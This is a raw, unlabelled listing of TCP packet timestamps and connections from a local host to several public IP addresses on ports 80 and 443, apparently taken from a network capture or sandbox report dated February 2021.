                                                                                                                                                Feb 22, 2021 23:44:24.821962118 CET4977380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:24.982536077 CET8049784192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.982593060 CET8049784192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.982702017 CET4978480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:24.985106945 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.017765999 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.033334970 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.036190987 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.036267996 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.058840036 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.058979034 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.059515953 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.100449085 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.116061926 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.116133928 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.116158962 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.116167068 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.116184950 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.116224051 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.124749899 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.171098948 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.172765970 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.172862053 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.173396111 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.220118046 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.354401112 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.354486942 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.354525089 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.354582071 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.354664087 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.354717970 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.354772091 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.354868889 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:25.563751936 CET4977580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.565114975 CET4978680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.620124102 CET8049775104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.620362997 CET4977580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.621635914 CET8049786104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.621786118 CET4978680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.622230053 CET4978680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.678472996 CET8049786104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.791949987 CET8049786104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.792049885 CET4978680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.794564962 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.817821980 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.851689100 CET44349776104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.851735115 CET44349776104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.851811886 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.854836941 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.874308109 CET44349787104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.874444008 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.875017881 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.932883978 CET44349787104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.932905912 CET44349787104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.932967901 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.933594942 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.940216064 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:25.990854979 CET44349787104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.998194933 CET44349787104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.107722998 CET44349787104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.107995987 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:26.112065077 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.168359995 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.168534040 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.169011116 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.225318909 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.225361109 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.225481033 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.226002932 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.231920958 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.284071922 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.290256023 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412338972 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412399054 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412432909 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412460089 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412528992 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412542105 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.412566900 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412576914 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.412596941 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412627935 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.412633896 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412645102 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.412652016 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.412666082 CET44349788104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.412692070 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.413069963 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.413094997 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.413136959 CET49788443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:26.416831017 CET4977880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:26.418160915 CET4978980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:26.471564054 CET8049778172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.471712112 CET4977880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:26.480547905 CET8049789172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:26.483084917 CET4978980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:26.483916998 CET4978980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:26.547215939 CET8049789172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:27.175228119 CET8049789172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:27.179210901 CET4978980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:27.187217951 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:27.240300894 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:27.240420103 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:27.241025925 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:27.294104099 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:27.300659895 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:27.303000927 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:27.303529978 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:27.311968088 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:27.358691931 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:27.366856098 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087686062 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087713003 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087727070 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087739944 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087754011 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087768078 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087786913 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087804079 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087821007 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087836027 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.087840080 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.087929010 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.087953091 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.088381052 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.088407993 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.119358063 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.119379997 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.119471073 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.119600058 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.119613886 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.119643927 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.119666100 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.119677067 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.120238066 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.120261908 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.120316029 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.120332956 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.121501923 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.121529102 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.121575117 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.121597052 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.122735977 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.122767925 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.122823954 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.122847080 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.123958111 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.123986959 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.124032021 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.124057055 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.125211000 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.125236988 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.125279903 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.125303030 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.126441956 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.126471043 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.126521111 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.127108097 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.127691031 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.127724886 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.127772093 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.127796888 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.128930092 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.128961086 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.129014969 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.129040956 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.140695095 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.140727997 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.140804052 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.141246080 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.141272068 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.141294956 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.141314983 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.141320944 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.142513037 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.142535925 CET44349790172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.142584085 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.142604113 CET49790443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:28.203263044 CET4978080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.204276085 CET4979180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.276132107 CET80497805.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.276235104 CET4978080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.277185917 CET80497915.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.277296066 CET4979180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.277803898 CET4979180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.351371050 CET80497915.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.351417065 CET80497915.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.351495028 CET4979180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.354150057 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.427721977 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.427906036 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.428441048 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.501355886 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.501657963 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.501734972 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.502264977 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.504893064 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.576030016 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.935018063 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.935064077 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.935097933 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.935142994 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.935178995 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.935200930 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.935214996 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.935251951 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.935266018 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.935301065 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:28.935316086 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:28.935368061 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:29.021503925 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:29.022051096 CET4978480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:29.023174047 CET4979380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:29.092667103 CET443497925.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.092863083 CET49792443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:29.185235023 CET8049784192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.185338974 CET4978480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:29.192604065 CET8049793192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.192715883 CET4979380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:29.193248987 CET4979380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:29.362867117 CET8049793192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.362917900 CET8049793192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.363034964 CET4979380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:29.363672018 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:29.410165071 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.411708117 CET44349785216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.411797047 CET49785443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:29.425802946 CET49794443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:29.467662096 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.470680952 CET49794443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:29.471462965 CET49794443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:29.513712883 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.528486967 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.528611898 CET49794443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:29.529046059 CET49794443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:29.537765980 CET49794443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:29.577332973 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.580228090 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.722373009 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.722424984 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.722457886 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.722476959 CET44349794216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:29.722659111 CET49794443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:30.234235048 CET4978680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:30.235286951 CET4979580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:30.290569067 CET8049786104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:30.290715933 CET4978680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:30.291335106 CET8049795104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:30.292011023 CET4979580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:30.292388916 CET4979580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:30.348716021 CET8049795104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:30.458415031 CET8049795104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:30.458632946 CET4979580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.282016039 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.326551914 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.339396954 CET44349787104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.339423895 CET44349787104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.339518070 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.340838909 CET49787443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.385576963 CET44349796104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.385727882 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.397783995 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.456685066 CET44349796104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.456706047 CET44349796104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.456784010 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.457904100 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.464267015 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.516804934 CET44349796104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.523462057 CET44349796104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.640084982 CET44349796104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.640156031 CET49796443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:31.642982960 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.699428082 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.699527025 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.700033903 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.759737015 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.759761095 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.759891987 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.760471106 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.768032074 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.818255901 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.825740099 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.947078943 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.947114944 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.947134018 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.947153091 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.947155952 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.947199106 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.947206020 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.947211981 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.947606087 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.947630882 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.947729111 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.947787046 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.948432922 CET4978980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:31.949142933 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.949172020 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.949189901 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.949203014 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.949207067 CET44349797104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.949223995 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.949248075 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.949546099 CET49797443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:31.949551105 CET4979880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:31.996694088 CET8049798172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:31.996824980 CET4979880192.168.2.6172.67.204.156
